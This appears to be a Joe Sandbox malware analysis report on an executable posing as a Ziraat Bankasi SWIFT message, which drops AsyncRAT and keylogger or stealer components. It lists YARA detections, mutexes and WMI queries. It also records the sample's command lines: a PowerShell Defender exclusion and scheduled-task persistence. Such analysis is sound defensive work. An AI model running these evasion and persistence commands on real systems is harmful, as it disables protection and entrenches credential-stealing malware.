Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E2061	9_2_069E2061
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E3DE2	9_2_069E3DE2
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E0A50	9_2_069E0A50
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E0A40	9_2_069E0A40
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_069E1BF9	9_2_069E1BF9
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D16EE0	9_2_06D16EE0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D15FF0	9_2_06D15FF0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D124C8	9_2_06D124C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D134C8	9_2_06D134C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D15290	9_2_06D15290
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D1AAB8	9_2_06D1AAB8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D17A18	9_2_06D17A18
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D16808	9_2_06D16808
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D16ED0	9_2_06D16ED0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D106E2	9_2_06D106E2
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D106E8	9_2_06D106E8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D167F9	9_2_06D167F9
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D15FE0	9_2_06D15FE0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D13FA0	9_2_06D13FA0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D18438	9_2_06D18438
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D18428	9_2_06D18428
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D102B0	9_2_06D102B0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D110F0	9_2_06D110F0
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 9_2_06D11838	9_2_06D11838
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_00A1D344	10_2_00A1D344
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6B6E8	10_2_06C6B6E8
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C69660	10_2_06C69660
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6055B	10_2_06C6055B
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C60560	10_2_06C60560
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C69228	10_2_06C69228
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6AD38	10_2_06C6AD38
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6A8FB	10_2_06C6A8FB
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_06C6A900	10_2_06C6A900
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Code function: 10_2_0A3C0448	10_2_0A3C0448
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 20_2_00007FF848B10EE9	20_2_00007FF848B10EE9
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 25_2_00007FF848AF0EE9	25_2_00007FF848AF0EE9
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 27_2_00007FF848AE9122	27_2_00007FF848AE9122
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 27_2_00007FF848AE0EE9	27_2_00007FF848AE0EE9
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 27_2_00007FF848AE8376	27_2_00007FF848AE8376

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\XClient.exe D868406F1FDC6A5C15A70F03F6279FB8A3FE190EA5A4911BF6839FC483C753B0
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\build.exe D771F70BA342E5D4CD7F129A4A2B4A6C6C7293233135F266DB33F356986A70F9

Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 1016

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2144967005.0000000003C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2144967005.0000000003C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2142691697.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameX-Red.exe4 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2148823308.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2142691697.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2148223816.0000000006F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000002.2134586640.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000000.00000000.2090806947.0000000000920000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGTCv.exe@ vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.00000000041E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSteanings.exe8 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.000000000423E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSteanings.exe8 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2121958472.000000000045A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameX-Red.exe4 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2130198719.0000000004289000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSteanings.exe8 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, 00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Binary or memory string: OriginalFilenameGTCv.exe@ vs Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.0.XClient.exe.8c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.XClient.exe.2ce4f08.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.XClient.exe.1d020000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31b7898.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.YkxAHNcqEmoeLS.exe.2a577e4.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.XClient.exe.1d020000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31a33f8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.YkxAHNcqEmoeLS.exe.2a4d588.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.31ad63c.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.XClient.exe.1cbe0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.YkxAHNcqEmoeLS.exe.2a43344.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.XClient.exe.1cbe0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.XClient.exe.2ce4f08.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: XClient.exe PID: 2604, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YkxAHNcqEmoeLS.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3f180f0.0.raw.unpack, ctkeyaynkqfwzwfm.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.47b3330.1.raw.unpack, ctkeyaynkqfwzwfm.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3c7e790.2.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.6f90000.4.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'
Source: XClient.exe.7.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.7.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.7.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: XClient.exe.7.dr, Settings.cs

Base64 encoded string: 'Li3D6xJyfjNirkvTw4IKKITXKoAlILEoQOC6wzYmjhT5RoU8SedBt0R+YyvrNE+F', 'L3Fv/Av3MtMUvAiSppKewrOZ2Mc5Bt23HDFEmqV8HWgje6r9+B44i8rudatctlsm'

Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, MISbcKHd5xLHqRIyc7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient.exe.7.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.7.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, MISbcKHd5xLHqRIyc7.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, uD92bqTvUTmybDr5iq.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, uD92bqTvUTmybDr5iq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.7b60000.5.raw.unpack, uD92bqTvUTmybDr5iq.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, uD92bqTvUTmybDr5iq.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, uD92bqTvUTmybDr5iq.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe.3d3a030.3.raw.unpack, uD92bqTvUTmybDr5iq.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/29@4/5

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File created: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Mutant created: \Sessions\1\BaseNamedObjects\uEkeKJYeTTyZWfm
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: \Sessions\1\BaseNamedObjects\9GNxvcpH1EHQrLdj
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5852

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File created: C:\Users\user\AppData\Local\Temp\tmp89AD.tmp

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: XClient.exe, 00000008.00000002.2692349903.0000000015587000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015558000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000155B5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000033FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000003021000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000003BAC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000003B7E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000003012000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	ReversingLabs: Detection: 60%
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process created: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 1016
Source: unknown	Process created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
